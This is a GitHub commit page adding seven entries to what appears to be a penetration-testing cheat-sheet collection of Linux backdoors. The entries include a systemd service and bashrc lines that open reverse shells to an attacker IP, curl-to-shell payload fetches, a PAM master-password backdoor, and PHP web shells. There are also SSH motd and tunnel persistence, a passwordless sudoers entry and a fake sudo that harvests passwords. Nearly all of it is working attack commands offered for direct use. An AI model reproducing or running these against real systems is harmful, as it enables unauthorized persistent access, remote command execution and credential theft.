-
Notifications
You must be signed in to change notification settings - Fork 3
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Nicholas Ferreira
committed
Oct 26, 2023
1 parent
1ac4720
commit 7d45f6f
Showing
7 changed files
with
199 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| title = "Systemd services backdoor" | ||
| description = "" | ||
| tags = ["linux", "backdoor"] | ||
| source = ["https://hosakacorp.net/p/systemd-user.html"] | ||
|
|
||
| [[data]] | ||
| description = "Change <ATTACKER IP> and <ATTACKER PORT> and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:" | ||
| language = "ini" | ||
| command = """#!/bin/sh | ||
| IP="<ATTACKER IP>" | ||
| PORT="<ATTACKER PORT>" | ||
| SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/" | ||
| W_PATH="" | ||
| UNIT="voodoo.service" | ||
| UNIT_CONTENT="[Unit] | ||
| Description=Black magic happening, avert your eyes | ||
| [Service] | ||
| RemainAfterExit=yes | ||
| Type=simple | ||
| ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\" | ||
| [Install] | ||
| WantedBy=default.target" | ||
| for i in $SYSTEMD_PATH; do | ||
| mkdir -p "$i" | ||
| if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi | ||
| done | ||
| for k in $W_PATH; do | ||
| echo "$UNIT_CONTENT" > "$k/$UNIT" | ||
| echo "[*] created voodoo in '$k/$UNIT" | ||
| done | ||
| systemctl --user daemon-reload | ||
| systemctl --user restart $UNIT > /dev/null | ||
| systemctl --user enable $UNIT""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| title = "Bashrc backdoor" | ||
| description = "Get a reverse shell everytime a new terminal session is started" | ||
| tags = ["linux", "backdoor", "bash"] | ||
| source = [] | ||
|
|
||
| [[data]] | ||
| description = "" | ||
| language = "bash" | ||
| command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc""" | ||
|
|
||
| [[data]] | ||
| description = "Example executing remote commands via http:" | ||
| language = "bash" | ||
| command = """echo 'curl -sk https://<attacker-webserver.com>/script.sh | sh' >> ~/.bashrc""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,16 @@ | ||
| title = "Linux PAM backdoor" | ||
| description = "Log in into any user using a custom password (root required)" | ||
| tags = ["linux", "backdoor"] | ||
| source = ["https://github.com/zephrax/linux-pam-backdoor","https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9"] | ||
|
|
||
| [[data]] | ||
| description = "PAM (Pluggable Authentication Modules) backdoor to log in into any user (root required):" | ||
| language = "bash" | ||
| command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc | ||
| git clone https://github.com/zephrax/linux-pam-backdoor | ||
| #Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases) | ||
| #PAM version should be compatible with the one on the target machine | ||
| ./backdoor.sh -v 1.4.0 -p passw0rd | ||
| #This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine. | ||
| #Now log in into any user using the password 'passw0rd'. The original user's password still works.""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| title = "Internal enumeration for linux privilege escalation" | ||
| description = "Quickly get internal information and search for possible paths to escalate privileges" | ||
| tags = ["linux", "enum", "privesc"] | ||
| source = ["https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS"] | ||
|
|
||
| [[data]] | ||
| description = "Run LinPEAS directly from memory:" | ||
| language = "bash" | ||
| command = """curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh""" | ||
|
|
||
| [[data]] | ||
| description = "If you are on the same local network as the target:" | ||
| language = "bash" | ||
| command = """#Attacker: | ||
| sudo python3 -m http.server 80 | ||
| #Target: | ||
| curl <ATTACKER IP>/linpeas.sh | sh | ||
| """ | ||
|
|
||
| [[data]] | ||
| description = "Without curl:" | ||
| language = "bash" | ||
| command = """#Attacker: | ||
| sudo nc -q 5 -lvnp 80 < linpeas.sh | ||
| #Target: | ||
| cat < /dev/tcp/<ATTACKER IP>/80 | sh""" | ||
|
|
||
| [[data]] | ||
| description = "Execute from memory and send output back to the attacker:" | ||
| language = "bash" | ||
| command = """#Attacker: | ||
| nc -lvnp 9002 | tee linpeas.out | ||
| #Target: | ||
| curl <ATTACKER IP>:8000/linpeas.sh | sh | nc 10.10.14.20 9002 | ||
| # or | ||
| curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh | nc <ATTACKER IP> 9002 | ||
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| title = "PHP simple backdoors" | ||
| description = "" | ||
| tags = ["linux", "backdoor", "php"] | ||
| source = ["https://github.com/Nickguitar/YAPS"] | ||
|
|
||
| [[data]] | ||
| description = "Web PHP backdoor. Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):" | ||
| language = "php" | ||
| command = """<?php shell_exec($_REQUEST['x']);""" | ||
|
|
||
| [[data]] | ||
| description = "Web PHP backdoor (even stealthier):" | ||
| language = "php" | ||
| command = """#Run commands with | ||
| # curl -H "x:ls -la" example.com/backdoor.php | ||
| # curl -H "x:cat /etc/passwd" example.com/backdoor.php | ||
| <?php echo shell_exec($_SERVER['HTTP_X']);?>""" | ||
|
|
||
| [[data]] | ||
| description = "Tiniest PHP backdoor possible:" | ||
| language = "php" | ||
| command = """#Run commands with example.com/backdoor.php?0=whoami | ||
| <?=`$_GET[0]`?>""" | ||
|
|
||
| [[data]] | ||
| description = "YAPS (the most complete PHP reverse shell)" | ||
| language = "bash" | ||
| command = """#Upload it to the target machine | ||
| #https://github.com/Nickguitar/YAPS/raw/main/yaps.php | ||
| #Set up a listener on <PORT> and run on the attacker's machine: | ||
| curl -x POST -d "x=<ATTACKER IP>:<PORT>" example.com/yaps.php | ||
| #If you got access with the previous backdoors (will keep your IP on webserver logs): | ||
| #Access example.com/backdoor.php?0=php+yaps.php+<ATTACKER IP>+<PORT>""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| title = "SSH backdoors" | ||
| description = "" | ||
| tags = ["linux", "backdoor", "ssh"] | ||
| source = ["https://medium.com/@sec_for_safety/ssh-backdoor-how-to-get-a-proper-shell-on-the-victims-machine-52d28fe6dde1"] | ||
|
|
||
| [[data]] | ||
| description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file to mantain access." | ||
| language = "bash" | ||
| command = """#On your machine: | ||
| ssh-keygen -f ./id_rsa | ||
| cat id_rsa.pub #Copy the public key | ||
| #On the compromised machine (substitute <public key>): | ||
| echo '<public key>' >> ~/.ssh/authorized_keys | ||
| # set the right permissions | ||
| chmod 700 ~/ | ||
| chmod 700 ~/.ssh | ||
| chmod 600 ~/.ssh/authorized_keys | ||
| #Connect to the compromised machine with | ||
| ssh compromised-user@machine-ip -i id_rsa""" | ||
|
|
||
| [[data]] | ||
| description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH (root required):" | ||
| language = "bash" | ||
| command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f &' > /etc/update-motd.d/20-backdoor && chmod +x /etc/update-motd.d/20-backdoor""" | ||
|
|
||
| [[data]] | ||
| description = "Reverse SSH tunnel backdoor (firewall bypass)" | ||
| language = "bash" | ||
| command = """# Run this on the compromised machine: | ||
| ssh -N -R 9999:localhost:22 attacker-user@attackerip | ||
| # This will establish an SSH tunnel to the attacker's machine and forward any outgoing traffic from the attacker’s machine on localhost port 9999 back to the victim’s machine on port 22 localhost. | ||
| # Then, on the attacker's machine, run: | ||
| ssh -i ~/.ssh/id_rsa compromised-user@localhost -p 9999 | ||
| #This will be a persistent backdoor. If you want to clean it, you just need to kill the process running on your own machine on port 9999.""" | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| title = "Sudo backdoors" | ||
| description = "" | ||
| tags = ["linux", "backdoor", "sudo"] | ||
| source = ["https://github.com/nisay759/sudo-backdoor"] | ||
|
|
||
| [[data]] | ||
| description = "Add your unprivileged user to sudoers (substitute <USER>) (root required). This will give you permission to run any command as root with sudo." | ||
| language = "bash" | ||
| command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers""" | ||
|
|
||
| [[data]] | ||
| description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading sudo.sh, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:" | ||
| language = "bash" | ||
| command = """#Change /tmp/sudo if needed | ||
| wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo | ||
| chmod +x /tmp/sudo | ||
| echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc""" |